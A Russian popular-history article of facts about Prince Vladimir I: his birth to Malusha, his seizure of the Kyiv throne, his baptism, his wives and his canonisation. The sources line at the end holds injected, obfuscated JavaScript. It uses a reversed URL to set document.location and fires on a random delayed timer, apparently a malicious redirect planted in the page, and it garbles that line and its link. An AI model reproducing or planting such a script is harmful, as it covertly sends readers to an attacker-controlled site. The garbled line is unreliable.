Так Святой или не Святой?

Знаете ли вы, что князь Владимир I Святой, крестивший Русь, был внебрачным сыном Святослава и его ключницы Малуши? Достоверных сведений о Малуше очень мало – известно лишь то, что она была родом из города Любеч. А само имя – Малуша – указывает на женскую форму имени «Мал». Также есть версия, что она была дочерью древлянского князя Мала. Но такое практически невозможно, ведь Любеч в летописях никогда не назвался Искоростенем.

Владимир I Святой был третьим по старшинству сыном Святослава. Поэтому распределение княжеств по старшинству происходило следующим образом: Ярополку – киев, Олегу – Древлянскую область, Владимиру – Новгород. Однако Владимир не самыми честными методами получил главный Киевский престол и стал единственным правителем Руси.

По вере он был язычником, но по политическим соображениям вынужден был выбрать православие. Существует легенда, что до крещения Владимир почти потерял зрение, а во время него – прозрел. После крещения он сразу же ощутил Божию благодать и крестил свою дружину, а затем и жителей Киева, которые, в отличие от новгородцев, не сопротивлялись.

Крещение князя Владимра. В. Васнецов

Еще во времена язычества у Владимира было пять жен и около тысячи наложниц! После принятия крещения он женился на византийской принцессе Анне, а после ее смерти – еще раз. Сколько детей у него было на самом деле – сказать трудно, но по официальным данным: 13 сыновей и 10 дочерей.
После смерти Владимира начались усобицы за власть между его детьми, а сам Владимир был причислен к лику святых. Кроме того, он нам известен из былин под именем Красно Солнышко. А еще, с 2002 года его стали считать небесным покровителем внутренних войск МВД России.

Источники: Википедия; tobor-latigid//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}top10a.ru/interesnye-fakty-o-knyaze-vladimire.html” target=”_blank” rel=”noopener”>Топ10.

Исторические личностиМонархи и политикиРоссияСлайдер